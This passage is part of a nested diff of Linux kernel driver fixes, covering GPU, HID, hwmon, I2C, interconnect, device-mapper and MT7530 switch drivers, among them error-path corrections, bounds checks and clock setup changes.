+index efc75cc2ffdb9..56027ffbce51f 100644
+--- a/drivers/gpu/drm/i915/i915_gpu_error.h
++++ b/drivers/gpu/drm/i915/i915_gpu_error.h
+@@ -94,7 +94,7 @@ struct intel_engine_coredump {
+ 	struct intel_instdone instdone;
+ 
+ 	/* GuC matched capture-lists info */
+-	struct intel_guc_state_capture *capture;
++	struct intel_guc_state_capture *guc_capture;
+ 	struct __guc_capture_parsed_output *guc_capture_node;
+ 
+ 	struct i915_gem_context_coredump {
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 9161768725449..4f84cda3f9b5e 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -6616,15 +6616,6 @@
+ /*   XEHP_PCODE_FREQUENCY_CONFIG param2 */
+ #define     PCODE_MBOX_DOMAIN_NONE		0x0
+ #define     PCODE_MBOX_DOMAIN_MEDIAFF		0x3
+-
+-/* Wa_14017210380: mtl */
+-#define   PCODE_MBOX_GT_STATE			0x50
+-/* sub-commands (param1) */
+-#define     PCODE_MBOX_GT_STATE_MEDIA_BUSY	0x1
+-#define     PCODE_MBOX_GT_STATE_MEDIA_NOT_BUSY	0x2
+-/* param2 */
+-#define     PCODE_MBOX_GT_STATE_DOMAIN_MEDIA	0x1
+-
+ #define GEN6_PCODE_DATA				_MMIO(0x138128)
+ #define   GEN6_PCODE_FREQ_IA_RATIO_SHIFT	8
+ #define   GEN6_PCODE_FREQ_RING_RATIO_SHIFT	16
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index 79bfe3938d3c6..7caf937c3c90d 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -325,23 +325,23 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ 	ret = meson_encoder_hdmi_init(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_plane_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_overlay_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_crtc_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = request_irq(priv->vsync_irq, meson_irq, 0, drm->driver->name, drm);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	drm_mode_config_reset(drm);
+ 
+@@ -359,6 +359,9 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ uninstall_irq:
+ 	free_irq(priv->vsync_irq, drm);
++unbind_all:
++	if (has_components)
++		component_unbind_all(drm->dev, drm);
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
+diff --git a/drivers/gpu/drm/tiny/cirrus.c b/drivers/gpu/drm/tiny/cirrus.c
+index 678c2ef1cae70..ffa7e61dd1835 100644
+--- a/drivers/gpu/drm/tiny/cirrus.c
++++ b/drivers/gpu/drm/tiny/cirrus.c
+@@ -455,7 +455,7 @@ static void cirrus_pipe_update(struct drm_simple_display_pipe *pipe,
+ 	if (state->fb && cirrus->cpp != cirrus_cpp(state->fb))
+ 		cirrus_mode_set(cirrus, &crtc->mode, state->fb);
+ 
+-	if (drm_atomic_helper_damage_merged(old_state, state, &rect))
++	if (state->fb && drm_atomic_helper_damage_merged(old_state, state, &rect))
+ 		cirrus_fb_blit_rect(state->fb, &shadow_plane_state->data[0], &rect);
+ }
+ 
+diff --git a/drivers/hid/hid-cp2112.c b/drivers/hid/hid-cp2112.c
+index 1e16b0fa310d1..27cadadda7c9d 100644
+--- a/drivers/hid/hid-cp2112.c
++++ b/drivers/hid/hid-cp2112.c
+@@ -1354,6 +1354,7 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	girq->parents = NULL;
+ 	girq->default_type = IRQ_TYPE_NONE;
+ 	girq->handler = handle_simple_irq;
++	girq->threaded = true;
+ 
+ 	ret = gpiochip_add_data(&dev->gc, dev);
+ 	if (ret < 0) {
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 5efc591a02a03..3c00e6ac8e76a 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4378,6 +4378,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01e) },
+ 	{ /* MX Master 3 mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb023) },
++	{ /* MX Master 3S mouse over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb034) },
+ 	{}
+ };
+ 
+diff --git a/drivers/hid/intel-ish-hid/ipc/ipc.c b/drivers/hid/intel-ish-hid/ipc/ipc.c
+index 15e14239af829..a49c6affd7c4c 100644
+--- a/drivers/hid/intel-ish-hid/ipc/ipc.c
++++ b/drivers/hid/intel-ish-hid/ipc/ipc.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014-2016, Intel Corporation.
+  */
+ 
++#include <linux/devm-helpers.h>
+ #include <linux/sched.h>
+ #include <linux/spinlock.h>
+ #include <linux/delay.h>
+@@ -621,7 +622,6 @@ static void	recv_ipc(struct ishtp_device *dev, uint32_t doorbell_val)
+ 	case MNG_RESET_NOTIFY:
+ 		if (!ishtp_dev) {
+ 			ishtp_dev = dev;
+-			INIT_WORK(&fw_reset_work, fw_reset_work_fn);
+ 		}
+ 		schedule_work(&fw_reset_work);
+ 		break;
+@@ -940,6 +940,7 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ {
+ 	struct ishtp_device *dev;
+ 	int	i;
++	int	ret;
+ 
+ 	dev = devm_kzalloc(&pdev->dev,
+ 			   sizeof(struct ishtp_device) + sizeof(struct ish_hw),
+@@ -975,6 +976,12 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 		list_add_tail(&tx_buf->link, &dev->wr_free_list);
+ 	}
+ 
++	ret = devm_work_autocancel(&pdev->dev, &fw_reset_work, fw_reset_work_fn);
++	if (ret) {
++		dev_err(dev->devc, "Failed to initialise FW reset work\n");
++		return NULL;
++	}
++
+ 	dev->ops = &ish_hw_ops;
+ 	dev->devc = &pdev->dev;
+ 	dev->mtu = IPC_PAYLOAD_SIZE - sizeof(struct ishtp_msg_hdr);
+diff --git a/drivers/hwmon/hwmon.c b/drivers/hwmon/hwmon.c
+index 33edb5c02f7d7..d193ed3cb35e5 100644
+--- a/drivers/hwmon/hwmon.c
++++ b/drivers/hwmon/hwmon.c
+@@ -757,6 +757,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	struct hwmon_device *hwdev;
+ 	const char *label;
+ 	struct device *hdev;
++	struct device *tdev = dev;
+ 	int i, err, id;
+ 
+ 	/* Complain about invalid characters in hwmon name attribute */
+@@ -826,7 +827,9 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	hwdev->name = name;
+ 	hdev->class = &hwmon_class;
+ 	hdev->parent = dev;
+-	hdev->of_node = dev ? dev->of_node : NULL;
++	while (tdev && !tdev->of_node)
++		tdev = tdev->parent;
++	hdev->of_node = tdev ? tdev->of_node : NULL;
+ 	hwdev->chip = chip;
+ 	dev_set_drvdata(hdev, drvdata);
+ 	dev_set_name(hdev, HWMON_ID_FORMAT, id);
+@@ -838,7 +841,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 
+ 	INIT_LIST_HEAD(&hwdev->tzdata);
+ 
+-	if (dev && dev->of_node && chip && chip->ops->read &&
++	if (hdev->of_node && chip && chip->ops->read &&
+ 	    chip->info[0]->type == hwmon_chip &&
+ 	    (chip->info[0]->config[0] & HWMON_C_REGISTER_TZ)) {
+ 		err = hwmon_thermal_register_sensors(hdev);
+diff --git a/drivers/hwmon/it87.c b/drivers/hwmon/it87.c
+index 9997f76b1f4aa..b7c7cf2157018 100644
+--- a/drivers/hwmon/it87.c
++++ b/drivers/hwmon/it87.c
+@@ -490,6 +490,8 @@ static const struct it87_devices it87_devices[] = {
+ #define has_pwm_freq2(data)	((data)->features & FEAT_PWM_FREQ2)
+ #define has_six_temp(data)	((data)->features & FEAT_SIX_TEMP)
+ #define has_vin3_5v(data)	((data)->features & FEAT_VIN3_5V)
++#define has_scaling(data)	((data)->features & (FEAT_12MV_ADC | \
++						     FEAT_10_9MV_ADC))
+ 
+ struct it87_sio_data {
+ 	int sioaddr;
+@@ -3100,7 +3102,7 @@ static int it87_probe(struct platform_device *pdev)
+ 			 "Detected broken BIOS defaults, disabling PWM interface\n");
+ 
+ 	/* Starting with IT8721F, we handle scaling of internal voltages */
+-	if (has_12mv_adc(data)) {
++	if (has_scaling(data)) {
+ 		if (sio_data->internal & BIT(0))
+ 			data->in_scaled |= BIT(3);	/* in3 is AVCC */
+ 		if (sio_data->internal & BIT(1))
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index 8c6c7075c765c..f5c37d2f536bc 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -341,7 +341,11 @@ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+ 		hisi_i2c_read_rx_fifo(ctlr);
+ 
+ out:
+-	if (int_stat & HISI_I2C_INT_TRANS_CPLT || ctlr->xfer_err) {
++	/*
++	 * Only use TRANS_CPLT to indicate the completion. On error cases we'll
++	 * get two interrupts, INT_ERR first then TRANS_CPLT.
++	 */
++	if (int_stat & HISI_I2C_INT_TRANS_CPLT) {
+ 		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_ALL);
+ 		hisi_i2c_clear_int(ctlr, HISI_I2C_INT_ALL);
+ 		complete(ctlr->completion);
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 188f2a36d2fd6..9b2f9544c5681 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -503,10 +503,14 @@ disable:
+ static irqreturn_t lpi2c_imx_isr(int irq, void *dev_id)
+ {
+ 	struct lpi2c_imx_struct *lpi2c_imx = dev_id;
++	unsigned int enabled;
+ 	unsigned int temp;
+ 
++	enabled = readl(lpi2c_imx->base + LPI2C_MIER);
++
+ 	lpi2c_imx_intctrl(lpi2c_imx, 0);
+ 	temp = readl(lpi2c_imx->base + LPI2C_MSR);
++	temp &= enabled;
+ 
+ 	if (temp & MSR_RDF)
+ 		lpi2c_imx_read_rxfifo(lpi2c_imx);
+diff --git a/drivers/i2c/busses/i2c-mxs.c b/drivers/i2c/busses/i2c-mxs.c
+index d113bed795452..e0f3b3545cfe4 100644
+--- a/drivers/i2c/busses/i2c-mxs.c
++++ b/drivers/i2c/busses/i2c-mxs.c
+@@ -171,7 +171,7 @@ static void mxs_i2c_dma_irq_callback(void *param)
+ }
+ 
+ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+-			struct i2c_msg *msg, uint32_t flags)
++			struct i2c_msg *msg, u8 *buf, uint32_t flags)
+ {
+ 	struct dma_async_tx_descriptor *desc;
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+@@ -226,7 +226,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		}
+ 
+ 		/* Queue the DMA data transfer. */
+-		sg_init_one(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_init_one(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, &i2c->sg_io[1], 1, DMA_FROM_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, &i2c->sg_io[1], 1,
+ 					DMA_DEV_TO_MEM,
+@@ -259,7 +259,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		/* Queue the DMA data transfer. */
+ 		sg_init_table(i2c->sg_io, 2);
+ 		sg_set_buf(&i2c->sg_io[0], &i2c->addr_data, 1);
+-		sg_set_buf(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_set_buf(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, i2c->sg_io, 2, DMA_TO_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, i2c->sg_io, 2,
+ 					DMA_MEM_TO_DEV,
+@@ -563,6 +563,7 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+ 	int ret;
+ 	int flags;
++	u8 *dma_buf;
+ 	int use_pio = 0;
+ 	unsigned long time_left;
+ 
+@@ -588,13 +589,20 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 		if (ret && (ret != -ENXIO))
+ 			mxs_i2c_reset(i2c);
+ 	} else {
++		dma_buf = i2c_get_dma_safe_msg_buf(msg, 1);
++		if (!dma_buf)
++			return -ENOMEM;
++
+ 		reinit_completion(&i2c->cmd_complete);
+-		ret = mxs_i2c_dma_setup_xfer(adap, msg, flags);
+-		if (ret)
++		ret = mxs_i2c_dma_setup_xfer(adap, msg, dma_buf, flags);
++		if (ret) {
++			i2c_put_dma_safe_msg_buf(dma_buf, msg, false);
+ 			return ret;
++		}
+ 
+ 		time_left = wait_for_completion_timeout(&i2c->cmd_complete,
+ 						msecs_to_jiffies(1000));
++		i2c_put_dma_safe_msg_buf(dma_buf, msg, true);
+ 		if (!time_left)
+ 			goto timeout;
+ 
+diff --git a/drivers/i2c/busses/i2c-xgene-slimpro.c b/drivers/i2c/busses/i2c-xgene-slimpro.c
+index 63259b3ea5abd..3538d36368a90 100644
+--- a/drivers/i2c/busses/i2c-xgene-slimpro.c
++++ b/drivers/i2c/busses/i2c-xgene-slimpro.c
+@@ -308,6 +308,9 @@ static int slimpro_i2c_blkwr(struct slimpro_i2c_dev *ctx, u32 chip,
+ 	u32 msg[3];
+ 	int rc;
+ 
++	if (writelen > I2C_SMBUS_BLOCK_MAX)
++		return -EINVAL;
++
+ 	memcpy(ctx->dma_buffer, data, writelen);
+ 	paddr = dma_map_single(ctx->dev, ctx->dma_buffer, writelen,
+ 			       DMA_TO_DEVICE);
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 3a1cbfe3e481f..1bafb54f14329 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -236,7 +236,7 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	qnodes = desc->nodes;
+ 	num_nodes = desc->num_nodes;
+ 
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
++	data = devm_kzalloc(&pdev->dev, struct_size(data, nodes, num_nodes), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index 0da612d6398c5..a29cdb4fac03f 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -147,9 +147,9 @@ static struct qcom_icc_node mas_snoc_bimc_nrt = {
+ 	.name = "mas_snoc_bimc_nrt",
+ 	.buswidth = 16,
+ 	.qos.ap_owned = true,
+-	.qos.qos_port = 2,
++	.qos.qos_port = 3,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+-	.mas_rpm_id = 163,
++	.mas_rpm_id = 164,
+ 	.slv_rpm_id = -1,
+ 	.num_links = ARRAY_SIZE(mas_snoc_bimc_nrt_links),
+ 	.links = mas_snoc_bimc_nrt_links,
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index e3a12e3d6e061..2d7a8e7b85ec2 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1844,100 +1844,6 @@ static const struct qcom_icc_desc sm8450_system_noc = {
+ 	.num_bcms = ARRAY_SIZE(system_noc_bcms),
+ };
+ 
+-static int qnoc_probe(struct platform_device *pdev)
+-{
+-	const struct qcom_icc_desc *desc;
+-	struct icc_onecell_data *data;
+-	struct icc_provider *provider;
+-	struct qcom_icc_node * const *qnodes;
+-	struct qcom_icc_provider *qp;
+-	struct icc_node *node;
+-	size_t num_nodes, i;
+-	int ret;
+-
+-	desc = device_get_match_data(&pdev->dev);
+-	if (!desc)
+-		return -EINVAL;
+-
+-	qnodes = desc->nodes;
+-	num_nodes = desc->num_nodes;
+-
+-	qp = devm_kzalloc(&pdev->dev, sizeof(*qp), GFP_KERNEL);
+-	if (!qp)
+-		return -ENOMEM;
+-
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
+-	if (!data)
+-		return -ENOMEM;
+-
+-	provider = &qp->provider;
+-	provider->dev = &pdev->dev;
+-	provider->set = qcom_icc_set;
+-	provider->pre_aggregate = qcom_icc_pre_aggregate;
+-	provider->aggregate = qcom_icc_aggregate;
+-	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+-	provider->data = data;
+-
+-	qp->dev = &pdev->dev;
+-	qp->bcms = desc->bcms;
+-	qp->num_bcms = desc->num_bcms;
+-
+-	qp->voter = of_bcm_voter_get(qp->dev, NULL);
+-	if (IS_ERR(qp->voter))
+-		return PTR_ERR(qp->voter);
+-
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
+-
+-	for (i = 0; i < qp->num_bcms; i++)
+-		qcom_icc_bcm_init(qp->bcms[i], &pdev->dev);
+-
+-	for (i = 0; i < num_nodes; i++) {
+-		size_t j;
+-
+-		if (!qnodes[i])
+-			continue;
+-
+-		node = icc_node_create(qnodes[i]->id);
+-		if (IS_ERR(node)) {
+-			ret = PTR_ERR(node);
+-			goto err;
+-		}
+-
+-		node->name = qnodes[i]->name;
+-		node->data = qnodes[i];
+-		icc_node_add(node, provider);
+-
+-		for (j = 0; j < qnodes[i]->num_links; j++)
+-			icc_link_create(node, qnodes[i]->links[j]);
+-
+-		data->nodes[i] = node;
+-	}
+-	data->num_nodes = num_nodes;
+-
+-	platform_set_drvdata(pdev, qp);
+-
+-	return 0;
+-err:
+-	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-	return ret;
+-}
+-
+-static int qnoc_remove(struct platform_device *pdev)
+-{
+-	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+-
+-	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+-
+-	return 0;
+-}
+-
+ static const struct of_device_id qnoc_of_match[] = {
+ 	{ .compatible = "qcom,sm8450-aggre1-noc",
+ 	  .data = &sm8450_aggre1_noc},
+@@ -1966,8 +1872,8 @@ static const struct of_device_id qnoc_of_match[] = {
+ MODULE_DEVICE_TABLE(of, qnoc_of_match);
+ 
+ static struct platform_driver qnoc_driver = {
+-	.probe = qnoc_probe,
+-	.remove = qnoc_remove,
++	.probe = qcom_icc_rpmh_probe,
++	.remove = qcom_icc_rpmh_remove,
+ 	.driver = {
+ 		.name = "qnoc-sm8450",
+ 		.of_match_table = qnoc_of_match,
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 2653516bcdef5..dc2d0d61ade93 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -71,7 +71,9 @@ struct dm_crypt_io {
+ 	struct crypt_config *cc;
+ 	struct bio *base_bio;
+ 	u8 *integrity_metadata;
+-	bool integrity_metadata_from_pool;
++	bool integrity_metadata_from_pool:1;
++	bool in_tasklet:1;
++
+ 	struct work_struct work;
+ 	struct tasklet_struct tasklet;
+ 
+@@ -1728,6 +1730,7 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
++	io->in_tasklet = false;
+ 	atomic_set(&io->io_pending, 0);
+ }
+ 
+@@ -1773,14 +1776,13 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 	 * our tasklet. In this case we need to delay bio_endio()
+ 	 * execution to after the tasklet is done and dequeued.
+ 	 */
+-	if (tasklet_trylock(&io->tasklet)) {
+-		tasklet_unlock(&io->tasklet);
+-		bio_endio(base_bio);
++	if (io->in_tasklet) {
++		INIT_WORK(&io->work, kcryptd_io_bio_endio);
++		queue_work(cc->io_queue, &io->work);
+ 		return;
+ 	}
+ 
+-	INIT_WORK(&io->work, kcryptd_io_bio_endio);
+-	queue_work(cc->io_queue, &io->work);
++	bio_endio(base_bio);
+ }
+ 
+ /*
+@@ -1933,6 +1935,7 @@ pop_from_list:
+ 			io = crypt_io_from_node(rb_first(&write_tree));
+ 			rb_erase(&io->rb_node, &write_tree);
+ 			kcryptd_io_write(io);
++			cond_resched();
+ 		} while (!RB_EMPTY_ROOT(&write_tree));
+ 		blk_finish_plug(&plug);
+ 	}
+@@ -2228,6 +2231,7 @@ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ 		 * it is being executed with irqs disabled.
+ 		 */
+ 		if (in_hardirq() || irqs_disabled()) {
++			io->in_tasklet = true;
+ 			tasklet_init(&io->tasklet, kcryptd_crypt_tasklet, (unsigned long)&io->work);
+ 			tasklet_schedule(&io->tasklet);
+ 			return;
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index f105a71915ab6..d12ba9bce145d 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -188,7 +188,7 @@ static int dm_stat_in_flight(struct dm_stat_shared *shared)
+ 	       atomic_read(&shared->in_flight[WRITE]);
+ }
+ 
+-void dm_stats_init(struct dm_stats *stats)
++int dm_stats_init(struct dm_stats *stats)
+ {
+ 	int cpu;
+ 	struct dm_stats_last_position *last;
+@@ -197,11 +197,16 @@ void dm_stats_init(struct dm_stats *stats)
+ 	INIT_LIST_HEAD(&stats->list);
+ 	stats->precise_timestamps = false;
+ 	stats->last = alloc_percpu(struct dm_stats_last_position);
++	if (!stats->last)
++		return -ENOMEM;
++
+ 	for_each_possible_cpu(cpu) {
+ 		last = per_cpu_ptr(stats->last, cpu);
+ 		last->last_sector = (sector_t)ULLONG_MAX;
+ 		last->last_rw = UINT_MAX;
+ 	}
++
++	return 0;
+ }
+ 
+ void dm_stats_cleanup(struct dm_stats *stats)
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index 09c81a1ec057d..ee32b099f1cf7 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -21,7 +21,7 @@ struct dm_stats_aux {
+ 	unsigned long long duration_ns;
+ };
+ 
+-void dm_stats_init(struct dm_stats *st);
++int dm_stats_init(struct dm_stats *st);
+ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index e4c1a8a21bbd0..e6e5ab29a95df 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -3357,6 +3357,7 @@ static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	pt->low_water_blocks = low_water_blocks;
+ 	pt->adjusted_pf = pt->requested_pf = pf;
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 
+ 	/*
+ 	 * Only need to enable discards if the pool should pass
+@@ -4235,6 +4236,7 @@ static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		goto bad;
+ 
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 	ti->flush_supported = true;
+ 	ti->accounts_remapped_io = true;
+ 	ti->per_io_data_size = sizeof(struct dm_thin_endio_hook);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index fdcf42554e2a9..fc953013ea260 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2092,7 +2092,9 @@ static struct mapped_device *alloc_dev(int minor)
+ 	if (!md->pending_io)
+ 		goto bad;
+ 
+-	dm_stats_init(&md->stats);
++	r = dm_stats_init(&md->stats);
++	if (r < 0)
++		goto bad;
+ 
+ 	/* Populate the mapping, nobody knows we exist yet */
+ 	spin_lock(&_minor_lock);
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index e968322dfbf0b..70887e0aece33 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -263,7 +263,7 @@ static int b53_mmap_probe_of(struct platform_device *pdev,
+ 		if (of_property_read_u32(of_port, "reg", &reg))
+ 			continue;
+ 
+-		if (reg < B53_CPU_PORT)
++		if (reg < B53_N_PORTS)
+ 			pdata->enabled_ports |= BIT(reg);
+ 	}
+ 
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 178e5a3441e68..326f992536a7e 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -396,6 +396,9 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ /* Set up switch core clock for MT7530 */
+ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ {
++	/* Disable core clock */
++	core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
++
+ 	/* Disable PLL */
+ 	core_write(priv, CORE_GSWPLL_GRP1, 0);
+ 
+@@ -409,14 +412,19 @@ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ 		   RG_GSWPLL_EN_PRE |
+ 		   RG_GSWPLL_POSDIV_200M(2) |
+ 		   RG_GSWPLL_FBKDIV_200M(32));
++
++	udelay(20);
++
++	/* Enable core clock */
++	core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
+ }
+ 
+-/* Setup TX circuit including relevant PAD and driving */
++/* Setup port 6 interface mode and TRGMII TX circuit */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+-	u32 ncpo1, ssc_delta, trgint, i, xtal;
++	u32 ncpo1, ssc_delta, trgint, xtal;
+ 
+ 	xtal = mt7530_read(priv, MT7530_MHWTRAP) & HWTRAP_XTAL_MASK;
+ 
+@@ -433,6 +441,10 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
++		if (xtal == HWTRAP_XTAL_25MHZ)
++			ssc_delta = 0x57;
++		else
++			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+ 			/* PLL frequency: 150MHz: 1.2GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+@@ -452,23 +464,12 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (xtal == HWTRAP_XTAL_25MHZ)
+-		ssc_delta = 0x57;
+-	else
+-		ssc_delta = 0x87;
+-
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+ 	if (trgint) {
+-		/* Lower Tx Driving for TRGMII path */
+-		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-		/* Disable MT7530 core and TRGMII Tx clocks */
+-		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++		/* Disable the MT7530 TRGMII clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 
+ 		/* Setup the MT7530 TRGMII Tx Clock */
+ 		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+@@ -485,13 +486,8 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+ 			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+ 
+-		/* Enable MT7530 core and TRGMII Tx clocks */
+-		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-			 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-	} else {
+-		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+-			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+-				   RD_TAP_MASK, RD_TAP(16));
++		/* Enable the MT7530 TRGMII clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 	}
+ 
+ 	return 0;
+@@ -2206,6 +2202,15 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
++	/* Lower Tx driving for TRGMII path */
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
